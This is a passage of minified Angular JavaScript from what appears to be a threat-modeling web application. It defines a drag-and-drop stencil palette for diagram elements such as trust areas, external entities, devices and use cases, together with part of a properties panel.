"),u(),s(98,"\n        "),u(),s(99,"\n      "),u(),s(100,"\n    "),u(),s(101,"\n\n    "),ln(),m(102,"mat-expansion-panel",2),s(103,"\n      "),m(104,"mat-expansion-panel-header"),s(105,"\n        "),m(106,"mat-panel-title"),s(107,"\n          Interface\n        "),u(),s(108,"\n        "),m(109,"mat-panel-description"),s(110,"\n          "),m(111,"mat-icon"),s(112,"sync_alt"),u(),s(113,"\n        "),u(),s(114,"\n      "),u(),s(115,"\n  \n      "),m(116,"div",3),s(117,"\n        "),m(118,"div",26),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Interface1"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(119,"\n          "),m(120,"div"),s(121,"\n            Interface\n          "),u(),s(122,"\n          "),m(123,"div",27),s(124,"\n          "),u(),s(125,"\n        "),u(),s(126,"\n        "),s(127,"\n      "),u(),s(128,"\n    "),u(),s(129,"\n\n    "),m(130,"mat-expansion-panel",2),s(131,"\n      "),m(132,"mat-expansion-panel-header"),s(133,"\n        "),m(134,"mat-panel-title"),s(135,"\n          External Entity\n        "),u(),s(136,"\n        "),m(137,"mat-panel-description"),s(138,"\n          "),m(139,"mat-icon"),s(140,"cloud"),u(),s(141,"\n        "),u(),s(142,"\n      "),u(),s(143,"\n\n      "),m(144,"div",3),s(145,"\n        "),m(146,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"External Entity"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),m(147,"div",16),s(148,"External Entity"),u()(),s(149,"\n      "),u(),s(150,"\n    "),u(),s(151,"\n    "),m(152,"mat-expansion-panel",2),s(153,"\n      "),m(154,"mat-expansion-panel-header"),s(155,"\n        "),m(156,"mat-panel-title"),s(157,"\n          Trust Area\n        "),u(),s(158,"\n        "),m(159,"mat-panel-description"),s(160,"\n          "),m(161,"mat-icon"),s(162,"select_all"),u(),s(163,"\n        "),u(),s(164,"\n      "),u(),s(165,"\n\n      "),m(166,"div",3),s(167,"\n        "),m(168,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Trust Area"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),m(169,"div",17),s(170,"Trust Area"),u()(),s(171,"\n      "),u(),s(172,"\n    "),u(),s(173,"\n  "),Mt()}if(2&t){const e=B();C(20),ri("border-color",e.StrokeColor),C(6),ri("border-color",e.StrokeColor),C(2),ri("border-color",e.StrokeColor),C(25),ri("border-color",e.StrokeColor),C(6),ri("border-color",e.StrokeColor),C(2),ri("border-color",e.StrokeColor),C(27),ri("stroke",e.StrokeColor),C(2),ri("stroke",e.StrokeColor),C(4),ri("fill",e.StrokeColor),C(29),ri("border-color",e.StrokeColor),C(24),ri("border-color",e.StrokeColor),C(22),ri("border-color",e.StrokeColor)}}function jlt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),m(2,"div",16),s(3),u(),s(4,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetContextRefToolTip(e)),C(2),ri("border-color",i.theme.Primary),C(1),ke(e.name)}}function Qlt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),m(2,"div",16),s(3),u(),s(4,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetContextRefToolTip(e)),C(2),ri("border-color",i.theme.Primary),C(1),ke(e.name)}}function $lt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(B(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(B(2).onDragEnd())}),s(1,"\n          "),fi(),m(2,"svg",8),s(3,"\n            "),it(4,"circle",23),s(5,"\n            "),it(6,"path",24),s(7,"\n            "),m(8,"text",10),s(9,"\n              "),m(10,"tspan",25),s(11),u(),s(12,"\n            "),u(),s(13,"\n          "),u(),s(14,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);at("matTooltip",i.GetContextRefToolTip(e)),C(4),ri("stroke",i.theme.Primary),C(2),ri("stroke",i.theme.Primary),C(4),ri("fill",i.StrokeColor),C(1),ke(e.name)}}function Klt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-expansion-panel",2),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7,"\n          Device\n        "),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n          "),m(11,"mat-icon"),s(12,"check_box_outline_blank"),u(),s(13,"\n        "),u(),s(14,"\n      "),u(),s(15,"\n  \n      "),m(16,"div",3),s(17,"\n        "),ne(18,jlt,5,4,"div",28),s(19,"\n      "),u(),s(20,"\n    "),u(),s(21,"\n\n    "),m(22,"mat-expansion-panel",2),s(23,"\n      "),m(24,"mat-expansion-panel-header"),s(25,"\n        "),m(26,"mat-panel-title"),s(27,"\n          App\n        "),u(),s(28,"\n        "),m(29,"mat-panel-description"),s(30,"\n          "),m(31,"mat-icon"),s(32,"check_box_outline_blank"),u(),s(33,"\n        "),u(),s(34,"\n      "),u(),s(35,"\n  \n      "),m(36,"div",3),s(37,"\n        "),ne(38,Qlt,5,4,"div",28),s(39,"\n      "),u(),s(40,"\n    "),u(),s(41,"\n\n    "),m(42,"mat-expansion-panel",2),s(43,"\n      "),m(44,"mat-expansion-panel-header"),s(45,"\n        "),m(46,"mat-panel-title"),s(47,"\n          Actor\n        "),u(),s(48,"\n        "),m(49,"mat-panel-description"),s(50,"\n          "),m(51,"mat-icon"),s(52,"people"),u(),s(53,"\n        "),u(),s(54,"\n      "),u(),s(55,"\n  \n      "),m(56,"div",3),s(57,"\n        "),ne(58,$lt,15,8,"div",28),s(59,"\n      "),u(),s(60,"\n    "),u(),s(61,"\n\n    "),m(62,"mat-expansion-panel",2),s(63,"\n      "),m(64,"mat-expansion-panel-header"),s(65,"\n        "),m(66,"mat-panel-title"),s(67,"\n          Use Case\n        "),u(),s(68,"\n        "),m(69,"mat-panel-description"),s(70,"\n          "),m(71,"mat-icon"),s(72,"radio_button_unchecked"),u(),s(73,"\n        "),u(),s(74,"\n      "),u(),s(75,"\n  \n      "),m(76,"div",3),s(77,"\n        "),m(78,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Use Case"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),s(79,"\n          "),fi(),m(80,"svg",8),s(81,"\n            "),it(82,"ellipse",29),s(83,"\n            "),m(84,"text",10),s(85,"\n              "),m(86,"tspan",30),s(87,"Use Case"),u(),s(88,"\n            "),u(),s(89,"\n          "),u(),s(90,"\n        "),u(),s(91,"\n      "),u(),s(92,"\n    "),u(),s(93,"\n\n    "),ln(),m(94,"mat-expansion-panel",2),s(95,"\n      "),m(96,"mat-expansion-panel-header"),s(97,"\n        "),m(98,"mat-panel-title"),s(99,"\n          Trust Area\n        "),u(),s(100,"\n        "),m(101,"mat-panel-description"),s(102,"\n          "),m(103,"mat-icon"),s(104,"select_all"),u(),s(105,"\n        "),u(),s(106,"\n      "),u(),s(107,"\n\n      "),m(108,"div",3),s(109,"\n        "),m(110,"div",20),he("dragstart",function(n){return be(e),Me(B().onDragContext(n,{name:"Trust Area"}))})("dragend",function(){return be(e),Me(B().onDragEnd())}),m(111,"div",17),s(112,"Trust Area"),u()(),s(113,"\n      "),u(),s(114,"\n    "),u(),s(115,"\n  "),Mt()}if(2&t){const e=B();C(18),V("ngForOf",e.DeviceStencils),C(20),V("ngForOf",e.AppStencils),C(20),V("ngForOf",e.InteractorStencils),C(24),ri("stroke",e.StrokeColor),C(4),ri("fill",e.StrokeColor),C(25),ri("border-color",e.StrokeColor)}}let Xlt=(()=>{class t{constructor(e,i,n){this.dataService=e,this.theme=i,this.translate=n,this.stencilBuffer={},this.StrokeColor="black",this.wrapBuffer={},this.initalizeStencils(),this.dataService.Project.DFDElementsChanged.subscribe(r=>{r.Type==Ja.Removed&&this.initalizeStencils()}),this.dataService.Project.DevicesChanged.subscribe(r=>{this.initalizeStencils()}),this.dataService.Project.MobileAppsChanged.subscribe(r=>{this.initalizeStencils()})}get ProcessStencils(){return this.stencilBuffer.P[this.NodeType]}get DataStoreStencils(){return this.stencilBuffer.DS[this.NodeType]}get ExternalEntityStencils(){return this.stencilBuffer.EE[this.NodeType]}get DataFlowStencils(){return this.stencilBuffer.DF[this.NodeType]}get TrustAreaStencils(){return this.stencilBuffer.TA[this.NodeType]}get PhysicalLinkStencils(){return this.stencilBuffer.PL[this.NodeType]}get InterfaceStencils(){return this.stencilBuffer.IF[this.NodeType]}get StencilTemplates(){return this.stencilBuffer.ST[this.NodeType]}get DeviceStencils(){return this.stencilBuffer.DEV[this.NodeType]}get AppStencils(){return this.stencilBuffer.APP[this.NodeType]}get InteractorStencils(){return this.stencilBuffer.ACT[this.NodeType]}get ComponentTypes(){let e=[];const i=this.selectedNode.data;return this.dataService.Config.GetMyComponentTypes(this.NodeType==aa.Software?zr.Software:zr.Process).filter(r=>!i.GetChildren().map(c=>c.Type).includes(r)).forEach(r=>e.push(r)),e}get NodeType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.dataType}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.initalizeStencils()}ngOnInit(){this.setColors(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(e=>{this.setColors(e)})}initalizeStencils(){if([aa.Software,aa.Process].includes(this.NodeType))return;const e=(r,c,d,T,k)=>{if(this.stencilBuffer[r][c]=[],d.sort(),d.forEach(q=>{this.dataService.Config.GetStencilTypes().filter(Y=>Y.IsDefault&&Y.ElementTypeID==q).forEach(Y=>this.stencilBuffer[r][c].push({stencilID:Y.ID,name:Y.Name}))}),T&&T.forEach(q=>this.stencilBuffer[r][c].push(...this.addDFDElementReferences(q))),k){const q=this.dataService.Config.GetStencilTypes().find(Y=>Y.IsDefault&&Y.ElementTypeID==d[0]);k.forEach(Y=>this.stencilBuffer[r][c].push(...this.addContextElementReferences(Y).map(te=>({name:te.name,stencilID:q.ID}))))}d.forEach(q=>{this.dataService.Config.GetStencilTypes().filter(Y=>!Y.IsDefault&&Y.ElementTypeID==q).forEach(Y=>this.stencilBuffer[r][c].push({stencilID:Y.ID,name:Y.Name}))}),d.forEach(q=>{this.dataService.Config.GetStencilTypeTemplates().filter(te=>(c==aa.Hardware&&te.ListInHWDiagram||c==aa.Dataflow&&te.ListInUCDiagram)&&te.StencilTypes.length>0&&te.ListInElementTypeIDs.includes(q)).forEach(te=>this.stencilBuffer[r][c].push({templateID:te.ID,name:te.Name}))})};let i="P";this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyProcessing]),e(i,aa.Dataflow,[Et.LogProcessing],null,[Aa.MobileApp]),i="DS",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyDataStore]),e(i,aa.Dataflow,[Et.LogDataStore]),i="EE",this.stencilBuffer[i]={},e(i,aa.Dataflow,[Et.LogExternalEntity,Et.PhyExternalEntity],[Et.LogExternalEntity,Et.PhyExternalEntity]),i="DF",this.stencilBuffer[i]={},e(i,aa.Dataflow,[Et.DataFlow]),i="TA",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyTrustArea]),e(i,aa.Dataflow,[Et.LogTrustArea,Et.PhyTrustArea],[Et.PhyTrustArea],[Aa.MobileApp]),i="PL",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhysicalLink]),e(i,aa.Dataflow,[Et.PhysicalLink],[Et.PhysicalLink]),i="IF",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.Interface]),this.stencilBuffer[i][aa.Dataflow]=[];const n=this.dataService.Config.GetStencilTypes().filter(r=>r.ElementTypeID==Et.Interface&&null!=r.TemplateDFD);this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInUCDiagram&&r.StencilTypes.length>0&&n.some(c=>c.TemplateDFD==r)).forEach(r=>this.stencilBuffer[i][aa.Dataflow].push({templateID:r.ID,name:r.Name})),i="ST",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.Hardware]=[],this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInHWDiagram&&r.StencilTypes.length>0).forEach(r=>this.stencilBuffer[i][aa.Hardware].push({templateID:r.ID,name:r.Name})),this.stencilBuffer[i][aa.Dataflow]=[],this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInUCDiagram&&r.StencilTypes.length>0).forEach(r=>this.stencilBuffer[i][aa.Dataflow].push({templateID:r.ID,name:r.Name})),i="DEV",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.Device),i="APP",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.MobileApp),i="ACT",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.Interactor)}addContextElementReferences(e){let i=[];return this.dataService.Project.GetContextElements().filter(n=>{var r,c,d;return!(n instanceof Ts||n instanceof Bg)&&n.Type==e&&(null===(r=this.dataService.Project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)!=(null===(d=null===(c=this.selectedNode)||void 0===c?void 0:c.data)||void 0===d?void 0:d.ID)}).forEach(n=>{i.push({elementID:n.ID,elementType:e,name:n.Name})}),i}addDFDElementReferences(e){let i=[];return this.dataService.Project.GetDFDElements().filter(n=>{var r,c,d,T;return!(n instanceof td||n instanceof zm)&&(null===(r=n.GetProperty("Type"))||void 0===r?void 0:r.ElementTypeID)==e&&(null===(c=this.dataService.Project.FindDiagramOfElement(n.ID))||void 0===c?void 0:c.ID)!=(null===(T=null===(d=this.selectedNode)||void 0===d?void 0:d.data)||void 0===T?void 0:T.ID)}).forEach(n=>{i.push({elementID:n.ID,name:n.Name})}),i}onDrag(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({stencilRef:i}));var r=document.createElement("div");r.textContent=i.name;let c=null;i.stencilID?c=this.dataService.Config.GetStencilType(i.stencilID):i.elementID?c=this.dataService.Project.GetDFDElement(i.elementID).GetProperty("Type"):i.templateID&&r.classList.add("trust-area"),c&&(c.ElementTypeID==Et.LogProcessing||c.ElementTypeID==Et.PhyProcessing?(r.classList.add("process"),r.style.borderStyle="solid",r.style.borderRadius="10px"):c.ElementTypeID==Et.LogDataStore||c.ElementTypeID==Et.PhyDataStore?(r.style.borderTopStyle="solid",r.style.borderBottomStyle="solid"):c.ElementTypeID==Et.LogExternalEntity||c.ElementTypeID==Et.PhyExternalEntity?r.style.borderStyle="solid":c.ElementTypeID==Et.LogTrustArea||c.ElementTypeID==Et.PhyTrustArea?r.style.borderStyle="dashed":c.ElementTypeID==Et.PhysicalLink?r.classList.add("physical-link"):c.ElementTypeID==Et.Interface?r.classList.add("interface"):console.error("ElementTypeID not implemented",c.ElementTypeID)),r.style.width="140px",r.style.height="75px",this.theme.IsDarkMode&&(r.style.backgroundColor="#424242"),r.style.borderColor=this.theme.IsDarkMode?"white":"black",r.style.textAlign="center",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(r),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left="-145px",this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragContext(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({contextRef:i}));let r="200px",c="200px",d="-205px";i.elementType==Aa.Device&&(r="250px",c="350px",d="-255px"),i.elementType==Aa.MobileApp?(r="250px",c="350px",d="-255px"):"Interactor"==i.name||i.elementType==Aa.Interactor?(r="40px",c="50px",d="-45px"):i.name.startsWith("Interface")?(r="25px",c="25px",d="-25px"):"Use Case"==i.name?(r="140px",c="50px",d="-145px"):"External Entity"==i.name?(r="140px",c="75px",d="-145px"):"Trust Area"==i.name&&(r="300px",c="300px",d="-305px");var T=document.createElement("div");T.textContent=i.name.replace(/[0-9]/g,""),T.style.borderStyle="solid",T.style.width=r,T.style.height=c,this.theme.IsDarkMode&&(T.style.backgroundColor="#424242"),T.style.borderColor=this.theme.IsDarkMode?"white":"black",T.style.textAlign="center",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(T),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left=d,this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragComponent(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({componentTypeID:null==i?void 0:i.ID}));var r=document.createElement("div");r.textContent="Component",r.classList.add("process","element-base","element-large"),r.style.width="140px",r.style.height="75px",this.theme.IsDarkMode&&(r.style.backgroundColor="#424242"),r.style.borderColor=this.theme.IsDarkMode?"white":"black",r.style.borderStyle="solid",r.style.textAlign="center",r.style.borderRadius="10px",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(r),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left="-145px",this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragEnd(){document.querySelector("body").removeChild(this.dragDiv)}GetStencilRefToolTip(e){let i=e.name.replace(/\n/g," ");return e.elementID?i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.blueColor"):e.templateID&&(i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.purpleColor")),i}GetContextRefToolTip(e){let i=e.name.replace(/\n/g," ");return e.elementID&&(i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.blueColor")),i}WrapSVGText(e,i){if(null==e)return[];if(this.wrapBuffer[e])return this.wrapBuffer[e][i];let n=e.replace(/\n/g," ").split(" ");for(let c=0;c<n.length;c++){const d=n[c].indexOf("-");d>0&&(n.splice(c+1,0,n[c].substring(d+1)),n[c]=n[c].substring(0,d+1))}for(let c=0;c<n.length-1;c++)n[c].length+n[c+1].length<10&&(n[c]+=" "+n[c+1],n.splice(c+1,1));this.wrapBuffer[e]=[];const r=n.length<=2?1:0;for(let c=0;c<n.length;c++)this.wrapBuffer[e][c+r]=n[c];return this.WrapSVGText(e,i)}setColors(e){this.StrokeColor=e?"white":"black"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-stencil-palette"]],inputs:{selectedNode:"selectedNode"},decls:22,vars:10,consts:[["multi","","displayMode","flat",1,"stencil-headers-align"],[4,"ngIf"],["expanded","true"],[2,"display","flex","flex-wrap","wrap"],["draggable","true","class","draggable-element","matTooltipShowDelay","1000",3,"matTooltip","dragstart","dragend",4,"ngFor","ngForOf"],["expanded","true",4,"ngIf"],["draggable","true","matTooltipShowDelay","1000",1,"draggable-element",3,"matTooltip","dragstart","dragend"],[1,"process","element-base","element-small"],[1,"element-small"],["d","M 0 4 L 0 34 A 10 1 0 0 0 70 34 L 70 4 A 10 1 0 0 0 0 4 A 10 1 0 0 0 70 4",2,"stroke-width","3px","fill","none"],["text-anchor","middle","inline-size","60"],["y","12","x","35"],["y","22.5","x","35",3,"fill",4,"ngIf"],["y","33","x","35",3,"fill",4,"ngIf"],["y","22.5","x","35"],["y","33","x","35"],[1,"external-entity","element-base","element-small"],[1,"trust-area","element-base","element-small"],["d","M3,0 L60,0 L67,18.75 L60,37.5 L3,37.5 L10,18.75 L3,0",2,"stroke-width","3px","fill","none"],["d","M8,0 L67,0 L62,37.5 L3,37.5 L8,0",2,"stroke-width","3px","fill","none"],["draggable","true",1,"draggable-element",3,"dragstart","dragend"],["draggable","true","matTooltipShowDelay","1000","class","draggable-element",3,"matTooltip","dragstart","dragend",4,"ngFor","ngForOf"],[1,"device","element-base"],["cx","35","cy","6","r","4",2,"stroke-width","3px","fill","none"],["d","M30,25 L35,17 L40,25 M35,17 L35,10 M28,14 L42,14",2,"stroke-width","3px","fill","none"],["y","35","x","35"],["draggable","true",1,"draggable-element",2,"width","100px","height","52px",3,"dragstart","dragend"],[1,"external-entity","element-base","element-tiny",2,"margin-left","15px"],["matTooltipShowDelay","1000","draggable","true","class","draggable-element",3,"matTooltip","dragstart","dragend",4,"ngFor","ngForOf"],["cx","35","cy","18.5","rx","33","ry","17",2,"stroke-width","3px","fill","none"],["y","22","x","35"],["matTooltipShowDelay","1000","draggable","true",1,"draggable-element",3,"matTooltip","dragstart","dragend"]],template:function(e,i){1&e&&(m(0,"mat-accordion",0),s(1,"\n  "),ne(2,ylt,19,6,"ng-container",1),s(3,"\n  "),ne(4,blt,19,6,"ng-container",1),s(5,"\n  "),ne(6,Mlt,19,6,"ng-container",1),s(7,"\n  "),ne(8,vlt,19,6,"ng-container",1),s(9,"\n  "),ne(10,Alt,19,6,"ng-container",1),s(11,"\n  "),ne(12,Tlt,19,6,"ng-container",1),s(13,"\n\n  "),ne(14,Hlt,110,8,"ng-container",1),s(15,"\n  "),ne(16,qlt,26,1,"ng-container",1),s(17,"\n\n  "),ne(18,Glt,174,24,"ng-container",1),s(19,"\n\n  "),ne(20,Klt,116,9,"ng-container",1),s(21,"\n"),u()),2&e&&(C(2),V("ngIf","char-scope"==i.NodeType),C(2),V("ngIf","obj-impact"==i.NodeType),C(2),V("ngIf","use-case"==i.NodeType),C(2),V("ngIf","system-threats"==i.NodeType),C(2),V("ngIf","asset"==i.NodeType),C(2),V("ngIf","software"==i.NodeType||"process"==i.NodeType),C(2),V("ngIf","dataflow"==i.NodeType||"hardware"==i.NodeType),C(2),V("ngIf","software"==i.NodeType||"process"==i.NodeType),C(2),V("ngIf","context"==i.NodeType),C(2),V("ngIf","use-case"==i.NodeType))},dependencies:[Zi,Ri,oa,Pa,il,Ec,Dc,tl,wl,Xi],styles:['.stencil-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header[_ngcontent-%COMP%]{height:35px!important}.stencil-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{justify-content:right;flex-grow:1}.stencil-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel[_ngcontent-%COMP%]{background-color:transparent}.process[_ngcontent-%COMP%]{border-style:solid;border-radius:10px}.data-store[_ngcontent-%COMP%]{border-top-style:solid;border-bottom-style:solid}.external-entity[_ngcontent-%COMP%], .data-flow[_ngcontent-%COMP%]{border-style:solid}.trust-area[_ngcontent-%COMP%]{border-style:dashed}.physical-link[_ngcontent-%COMP%], .interface[_ngcontent-%COMP%]{border-style:solid}.device[_ngcontent-%COMP%]{border-left-style:solid;border-right-style:solid;border-bottom-style:solid;width:44px;height:25px;margin-bottom:10px;margin-left:10px;margin-right:10px;font-size:12px}.element-base[_ngcontent-%COMP%]{display:inline-block;text-align:center;overflow:hidden;text-overflow:ellipsis}.element-small[_ngcontent-%COMP%]{width:70px;height:37.5px;font-size:12px}.element-tiny[_ngcontent-%COMP%]{width:20px;height:20px;font-size:12px}.element-large[_ngcontent-%COMP%]{width:140px;height:75px}.draggable-element[_ngcontent-%COMP%]{margin:2px 2px -3px;cursor:pointer}.column[_ngcontent-%COMP%]{float:left;width:50%}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}  .mat-tooltip{white-space:pre-line!important}']}),t})(),KT=(()=>{class t{constructor(e){this.select=e,this.spacekeydown=new Tt,this.select._handleKeydown=i=>{if(" "==i.key){const n=this.select.panelOpen&&this.select.options.filter(r=>r.active)[0]||null;this.spacekeydown.emit(n?n.value:null)}else this.select.disabled||(this.select.panelOpen?this.select._handleOpenKeydown(i):this.select._handleClosedKeydown(i))}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nr,2))},t.\u0275dir=Ot({type:t,selectors:[["","no-space",""]],outputs:{spacekeydown:"spacekeydown"}}),t})();function Ylt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetArrowPositionName(e)))}}function Jlt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,Ylt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetArrowPositions())}}function Zlt(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(B(3).AssignNumberToAsset())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"properties.AssignNumber")))}function edt(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",23),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.checked))}),u()}if(2&t){const e=B().$implicit;V("checked",B(2).GetValue(e))("disabled",!e.Editable)}}function tdt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,e))}}function idt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=B().$implicit;return Me(B(2).SetValue(r,n.target.value))}),s(1,"\n          "),ne(2,tdt,3,4,"option",20),s(3,"\n        "),u()}if(2&t){const e=B().$implicit,i=B(2);Ct("disable",!e.Editable),V("ngModel",i.GetValue(e)),C(2),V("ngForOf",i.GetDeviceInterfaceNames())}}function adt(t,a){1&t&&(fi(),it(0,"circle",36)),2&t&&Rt("fill",B(4).GetIconColor())}function ndt(t,a){1&t&&(fi(),it(0,"circle",37)),2&t&&Rt("fill",B(4).GetIconColor())}function odt(t,a){1&t&&(fi(),it(0,"circle",38)),2&t&&Rt("fill",B(4).GetIconColor())}function rdt(t,a){1&t&&(fi(),it(0,"circle",39)),2&t&&Rt("fill",B(4).GetIconColor())}function sdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.NorthWest}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function cdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.NorthEast}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function ldt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.SouthWest}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function ddt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.SouthEast}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function mdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.NorthWest}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function udt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.NorthEast}))}),s(1,"\n                        "),fi(),m(2,"svg",45),s(3,"\n                          "),it(4,"circle",46),s(5,"\n                          "),it(6,"line",47),s(7,"\n                          "),it(8,"line",48),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(5);C(6),Rt("stroke",e.GetIconColor(!0)),C(2),Rt("stroke",e.GetIconColor(!0))}}function hdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=B(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.SouthWest}))}),s(1,"\n                       